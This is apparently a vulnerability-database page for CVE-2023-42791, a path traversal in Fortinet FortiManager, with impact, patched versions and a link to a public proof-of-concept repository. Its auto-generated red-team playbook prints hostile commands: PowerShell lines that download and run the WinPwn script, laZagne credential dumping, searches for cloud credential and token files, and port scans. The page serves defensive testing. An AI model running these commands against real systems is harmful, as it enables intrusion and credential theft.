CVE-2023-42791
Overview
This vulnerability is a relative path traversal affecting Fortinet FortiManager versions 6.2.0 through 7.4.0. The root cause lies in improper validation of user-supplied input within HTTP request paths, allowing crafted requests to manipulate file system path resolution. The affected component is the FortiManager's web interface handling of HTTP requests, which fails to sanitize path parameters, enabling unauthorized file access or command execution.
Vulnerability Description
A relative path traversal in Fortinet FortiManager version 7.4.0 and 7.2.0 through 7.2.3 and 7.0.0 through 7.0.8 and 6.4.0 through 6.4.12 and 6.2.0 through 6.2.11 allows attacker to execute unauthorized code or commands via crafted HTTP requests.
Impact
An attacker with network access and low-level privileges can exploit this vulnerability to execute arbitrary code or commands on the FortiManager system, potentially compromising confidentiality, integrity, and availability of management operations. The exploit requires crafted HTTP requests but no user interaction (UI:N). This can lead to unauthorized administrative control, data exposure, or disruption of managed network devices, significantly impacting enterprise security management. The CVSS vector indicates high impact on confidentiality, integrity, and availability (C:H/I:H/A:H) with low attack complexity (AC:L).
Solution
Fortinet has released patches addressing this vulnerability in FortiManager versions 7.4.1, 7.2.4, 7.0.9, 6.4.13, and 6.2.12 as detailed in the FortiGuard advisory FG-IR-23-189 (https://fortiguard.com/psirt/FG-IR-23-189). Administrators should upgrade affected FortiManager instances to these versions promptly. No alternative mitigations or workarounds are specified; applying the vendor-provided patches is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Fortinet FortiManager is characterized by a relative path traversal flaw, which allows an attacker to manipulate file paths in HTTP requests. This type of vulnerability typically arises when an application fails to properly sanitize input, enabling an attacker to access files and directories outside of the intended scope. In this case, the affected versions of FortiManager, including 7.4.0 and earlier releases down to 6.2.0, are susceptible to unauthorized code execution. By crafting specific HTTP requests, an attacker can exploit this flaw to execute arbitrary commands on the server, potentially gaining control over the system or accessing sensitive data.
Attack vectors for this vulnerability are primarily web-based, exploiting the FortiManager's web interface. An attacker could initiate a series of crafted HTTP requests targeting the vulnerable application, utilizing techniques such as directory traversal to navigate the file system. For instance, by including sequences like "../" in the request, the attacker can traverse directories and access files that should be restricted. This exploitation could lead to the execution of malicious scripts or commands, allowing the attacker to manipulate the system, exfiltrate data, or deploy further attacks within the network.
The real-world impact of this vulnerability is significant, particularly for organizations relying on FortiManager for centralized management of their security infrastructure. The potential for unauthorized code execution poses a severe business risk, as it could lead to data breaches, service disruptions, or unauthorized access to sensitive configurations. The implications extend beyond immediate financial losses; reputational damage and regulatory penalties could also arise from a successful exploitation. Given the critical role that FortiManager plays in managing security policies and devices, any compromise could jeopardize the entire security posture of an organization.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating FortiManager to the latest patched versions is crucial, as vendors typically release updates to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter and monitor HTTP requests, blocking malicious attempts to exploit the vulnerability. Conducting routine security assessments, including penetration testing and vulnerability scanning, will also aid in identifying potential weaknesses before they can be exploited. Furthermore, organizations should establish strict access controls and logging mechanisms to monitor for unusual activities that may indicate an attempted breach.
In conclusion, the relative path traversal vulnerability in Fortinet FortiManager presents a serious threat to organizations that utilize this platform for security management. The potential for unauthorized code execution through crafted HTTP requests underscores the importance of maintaining robust security practices. By prioritizing timely updates, employing detection mechanisms, and fostering a culture of security awareness, organizations can significantly reduce the risk associated with this vulnerability and enhance their overall cybersecurity resilience.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | 7.4.0 |
cpe:2.3:a:fortinet:fortimanager:7.4.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
synacktiv/CVE-2023-42791_CVE-2024-23666
Exploitations scripts for CVE-2023-42791 and CVE-2024-23666.
|
synacktiv | 6 | 2 | 2025-02-12 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-42791 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-23-189 |